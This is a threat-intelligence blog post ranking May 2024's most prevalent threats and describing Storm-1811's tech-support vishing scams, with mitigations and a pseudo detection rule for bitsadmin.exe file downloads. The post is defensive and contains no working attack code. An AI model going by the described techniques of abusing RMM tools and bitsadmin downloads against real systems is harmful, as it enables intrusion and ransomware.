Skip Navigation
Get a Demo
 
 
 
 
 
 
 
 
 
Resources Blog Threat intelligence

Intelligence Insights: June 2024

Storm-1811 rolls in and JavaScript lures remain popular in this month’s edition of Intelligence Insights

The Red Canary Team
Originally published . Last modified .

Highlights from May

After dropping out of the rankings last month, Atomic Stealer is back on our top 10 most prevalent threat list. It returned at its highest rank so far in our top 10, in a three-way tie for 2nd with SocGholish and this month’s top 10 newcomer, Storm-1811, which we share more about below.

XMRig activity increased enough to tie for 6th with Mimikatz, making this XMRig’s second appearance on the list after its December 2023 debut. Yellow Cockatoo also returned to the top 10 after a few months of reduced activity.

We had several familiar faces stay on the list in new positions, including Gootloader, which moved up from 8th to 5th, and Scarlet Goldfinch, which dropped from 3rd to 8th. Raspberry Robin, another list regular, fell out of the top 10 altogether in May.

This month’s Top 10 threats

To track pervasiveness over time, we identify the number of unique customer environments in which we observed a given threat and compare it to what we’ve seen in previous months.

Here’s how the numbers shook out for May 2024:

Month's rankThreat nameThreat description
Month's rank:

1

Threat name:Threat description :

Collection of Python classes to construct/manipulate network protocols

Month's rank:

2*

Threat name:

Atomic Stealer

Threat description :

Information stealer designed to target data within web browsers and locally stored files on macOS systems, with the goal of accessing sensitive information including credentials, payment card data, keychain details, and cryptocurrency wallets

Month's rank:

2*

Threat name:Threat description :

Dropper/downloader that uses compromised WordPress sites to redirect users to adversary infrastructure posing as necessary browser updates to trick users into running malicious code

Month's rank:

2*

Threat name:

Storm-1811

Threat description :

Financially motivated threat actor and Black Basta affiliate who uses tech support scams and RMM tools, notably Microsoft Quick Assist, for initial access

Month's rank:

5

Threat name:Threat description :

JScript dropper/downloader that typically poses as a document containing an "agreement,” often distributed through search engine redirects

Month's rank:

6*

Threat name:Threat description :

Open source tool that dumps credentials using various techniques

Month's rank:

6*

Threat name:

XMRig

Threat description :

Monero cryptocurrency miner that is often deployed as a secondary payload

Month's rank:

8*

Threat name:Threat description :

Malware family used as part of a botnet. Some variants are worms and frequently spread via infected USB drives

Month's rank:

8*

Threat name:Threat description :

Malware family capable of a range of behaviors, including DLL side-loading, capturing the screen, and keylogging

Month's rank:

8*

Threat name:Threat description :

Activity cluster that uses a distribution scheme similar to SocGholish and uses JScript files to drop NetSupport Manager onto victim systems

Month's rank:

8*

Threat name:Threat description :

Activity cluster characterized by the delivery of an information stealer and .NET RAT via search engine redirects

= trending up from previous month
= trending down from previous month
➡ = no change in rank from previous month

*Denotes a tie

Tracking Storm-1811’s help desk scams

Our newcomer to the list this month is Storm-1811. Beginning in late April 2024 and continuing throughout May, Red Canary saw an activity cluster that we are tracking as Storm-1811. This is Microsoft’s name for a financially motivated threat actor that uses social engineering to gain initial access to environments via remote monitoring and management (RMM) tools—including Microsoft Quick Assist—on victim endpoints.

Storm-1811 leverages different  communication methods in ways that increase the effectiveness of their social engineering scams. They use voice phishing (aka vishing) and call users masquerading as tech support, sometimes after reportedly flooding the users’ inboxes with emails. In recent attacks they have also reportedly used Microsoft Teams messages to increase their credibility as IT staff, according to Microsoft. The adversary convinces victims to provide remote access through Microsoft Quick Assist or by downloading and running AnyDesk.

After the adversary gains access, we observed Storm-1811 using  curl to download additional tools like OpenSSH, ScreenConnect, and NetSupport Manager. Other reported payloads include Impacket, used for lateral movement, and PsExec, used to deploy Black Basta ransomware

Social engineering attacks are, admittedly, hard to combat. Some mitigation strategies to consider are:

  • Training users to verify the identity of IT staff that call them via trusted internal methods, for example confirming identities with video calls or requiring a shared secret like the endpoint in question’s serial number.
  • QuickAssist is installed by default on Windows machines. If it is not in use in your environment, disable or uninstall it.
  • Inventory the RMMs that are approved for use in your environment. Investigate security alerts for unapproved RMMs and also suspicious activity related to approved RMMs. If possible, block RMMs commonly used in malicious attacks—for example, NetSupport, AnyDesk and ScreenConnect—that aren’t in use in your environment.

 

Red Canary also saw Storm-1811 use bitsadmin.exe to download follow-on payloads. This gives us a detection opportunity.

 


Detection opportunity: Executing the Background Intelligent Transfer Service (bitsadmin.exe) to download files

This pseudo detection analytic identifies execution of the Background Intelligent Transfer Service (bitsadmin.exe) with command options to signal file downloads. Adversaries like Storm-1811 use bitsadmin.exe to download malware as a way of bypassing application whitelisting solutions. Note that bitsadmin.exe may be used legitimately by some administration software in your environment.

process == (bitsadmin)

&&

command_line_includes == (download)

&&

deobfuscated_command_line_includes == (bitsadmin, download)

&&

command_line_does_not_include == (*)

 

Note: * is a placeholder for strings associated with legitimate use of bitsadmin in your environment

 


In case you missed it: Open your scripts with Notepad

Many malware families use scripts as part of their intrusions. They have been popular with adversaries for years, a trend that shows no sign of slowing down. These lures can come in the form of multiple script types, including JavaScript, and delivered multiple ways.

If a trusting user opens that malicious script, one way to mitigate script execution is to create a Group Policy Object (GPO) to change the default behavior of commonly misused script extensions, making them behave like benign text files that open in Notepad and do not automatically execute. On May 31, Jeff Felling and Red Canary published a blog about recent prevalent threats like SocGholish and Gootloader that use this technique, and shared specific details on how to create these GPOs to help protect your environment.

 

Scarlet Goldfinch: Taking flight with NetSupport Manager

 

Open with Notepad: Protecting users from malicious JavaScript

 

Intelligence Insights: May 2024

 

Intelligence Insights: April 2024

Subscribe to our blog

 
 
Back to Top